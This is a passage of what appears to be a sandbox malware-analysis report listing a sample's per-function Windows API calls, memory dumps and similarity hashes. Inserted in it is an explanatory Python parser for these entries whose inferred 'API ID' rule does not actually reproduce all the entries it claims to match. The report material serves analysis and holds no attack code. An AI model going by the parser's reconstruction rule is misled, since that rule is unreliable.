• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
• String ID:
• API String ID: 2027346449-0
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• GetMenu.USER32 ref: 0047A703
• GetMenuItemCount.USER32(00000000), ref: 0047A74F
• GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
• _wcslen.LIBCMT ref: 0047A79E
• GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
• GetSubMenu.USER32(00000000,?), ref: 0047A7F2
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
• String ID:
• API String ID: 3257027151-0
APIs
• GetParent.USER32(?), ref: 0044443B
• GetKeyboardState.USER32(?), ref: 00444450
• SetKeyboardState.USER32(?), ref: 004444A4
• PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
• PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetParent.USER32(?), ref: 00444633
• GetKeyboardState.USER32(?), ref: 00444648
• SetKeyboardState.USER32(?), ref: 0044469C
• PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
• PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
• ImageList_Remove.COMCTL32(?,?), ref: 004553D3
• SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2354583917-0
                                                                                                                                                                                                                                                            • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                                                                                                                                                            • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                                                                                                                                            • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 896007046-0
                                                                                                                                                                                                                                                            • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                                                                                                                                                            • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 00448ACF
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3429747543-0
                                                                                                                                                                                                                                                            • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                                                                                                                                                            • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
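Worked example of reading the per-function entries above. This is an added example, not Joe Sandbox code. It parses the "APIs" lines (API name, module, arguments with "?" for unresolved values, and the call-site address after "ref:") and the dotted ".sdmp" source-file names, and it reconstructs the "API ID" similarity string. The reconstruction rule is inferred by matching the three entries on this page: each API name loses its ANSI/Unicode A/W suffix, is split into CamelCase tokens, tokens are counted across the function, groups with the same count are concatenated alphabetically, and groups are joined with "$" from most to least frequent; "Get" is dropped (GetFocus contributes only "Focus"). How "Set" or other prefixes are treated is not determinable from this page, so the fourth entry (SetErrorMode / GetVolumeInformationW) is not checked. The sdmp field mapping (field 4 as base address, field 5 as page protection, field 7 as memory type, using the Windows MEMORY_BASIC_INFORMATION constants) is an assumption that matches the values seen above, not documented Joe Sandbox format.

```python
"""Parse Joe Sandbox per-function 'APIs' / 'Memory Dump Source' entries.

Added example, not Joe Sandbox code. The API ID rule is inferred from the
three entries on this page; the .sdmp field meanings are an assumption.
"""
import re
from collections import Counter
from dataclasses import dataclass

# "• SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F"
# "• GetFocus.USER32 ref: 00448ACF"  (no argument list)
API_LINE = re.compile(
    r"^\s*•\s*(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # int for literal hex arguments, None for '?' (unresolved)
    ref: int     # address of the call site


def parse_call(line):
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [] if raw is None else [None if a.strip() == "?" else int(a, 16)
                                   for a in raw.split(",")]
    return ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16))


def parse_api_block(text):
    return [c for c in (parse_call(l) for l in text.splitlines()) if c]


DROPPED_TOKENS = {"Get"}   # inferred: GetFocus -> "Focus" in the page's third entry


def tokens(api_name):
    base = re.sub(r"(?<=[a-z])[AW]$", "", api_name)   # SendMessageW -> SendMessage
    return [t for t in re.findall(r"[A-Z][^A-Z]*", base) if t not in DROPPED_TOKENS]


def api_id(calls):
    """Reconstruct the 'API ID' string (rule inferred from this page)."""
    counts = Counter(t for c in calls for t in tokens(c.name))
    groups = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


# Windows MEMORY_BASIC_INFORMATION constants. Which .sdmp field carries
# which value is an ASSUMPTION consistent with the dump names on this page.
PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
           0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x1000000: "MEM_IMAGE", 0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED"}


def parse_dump_name(name):
    fields = name.removesuffix(".sdmp").split(".")
    if len(fields) != 8:
        raise ValueError("unexpected .sdmp name layout: %s" % name)
    base, prot, typ = (int(fields[i], 16) for i in (3, 4, 6))
    return {"base": base, "protect": PROTECT.get(prot, hex(prot)),
            "type": MEM_TYPE.get(typ, hex(typ))}


# The three API blocks from this page, keyed by the API ID the report shows.
PAGE_ENTRIES = {
    "DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow": """
• SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
• ImageList_Remove.COMCTL32(?,?), ref: 004553D3
• SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760""",
    "Window$Enable$Show$MessageMoveSend": """
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
• SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09""",
    "Window$Enable$Show$FocusMessageSend": """
• SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
• GetFocus.USER32 ref: 00448ACF
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09""",
}


def reconstruct_page_entries():
    """Return (reported_api_id, reconstructed_api_id) for each page entry."""
    return [(shown, api_id(parse_api_block(block))) for shown, block in PAGE_ENTRIES.items()]


if __name__ == "__main__":
    for shown, got in reconstruct_page_entries():
        print("OK " if shown == got else "MISMATCH ", got)
    print(parse_dump_name("00000000.00000002.2999784282.0000000000401000."
                          "00000020.00000001.01000000.00000003.sdmp"))
```

Feeding the dump names through `parse_dump_name` gives the expected PE layout for a 0x400000-based image: the 0x401000 source region is PAGE_EXECUTE_READ (code), 0x490000 and 0x492000 are PAGE_READWRITE (data), 0x491000 is PAGE_WRITECOPY, and the header and read-only regions are PAGE_READONLY, all MEM_IMAGE. That is a quick sanity check that the "ref:" addresses in the API lists fall inside the executable region before you pivot on them in IDA.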
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu$\VH
• API String ID: 3164766367-2432546070
• Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
• Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
• Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
• Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
APIs
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
• SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
• SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: MessageSend
• String ID: Msctls_Progress32
• API String ID: 3850602802-3636473452
• Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
• Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
• Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
• Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
APIs
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Destroy$DeleteImageList_ObjectWindow$Icon
• String ID:
• API String ID: 3985565216-0
• Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
• Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
• Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
• Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
APIs
• _malloc.LIBCMT ref: 0041F707
  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• _free.LIBCMT ref: 0041F71A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: AllocateHeap_free_malloc
• String ID: [B
• API String ID: 1020059152-632041663
• Opcode ID: 82a9bffc186b76dd01f761a6380bc26b434c02cd1517f4e5ec4ccde3d03145b0
• Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
• Opcode Fuzzy Hash: 82a9bffc186b76dd01f761a6380bc26b434c02cd1517f4e5ec4ccde3d03145b0
• Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
APIs
• ___set_flsgetvalue.LIBCMT ref: 00413DA4
• __calloc_crt.LIBCMT ref: 00413DB0
• __getptd.LIBCMT ref: 00413DBD
• CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
• GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
• _free.LIBCMT ref: 00413E07
• __dosmaperr.LIBCMT ref: 00413E12
                                                                                                                                                                                                                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 155776804-0
                                                                                                                                                                                                                                                            • Opcode ID: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                                                                                                                                                                                                                                            • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
APIs
  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
• GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
• DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
• GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
• DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
• CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
• Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
• Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
• Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
APIs
• ___set_flsgetvalue.LIBCMT ref: 00413D20
  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
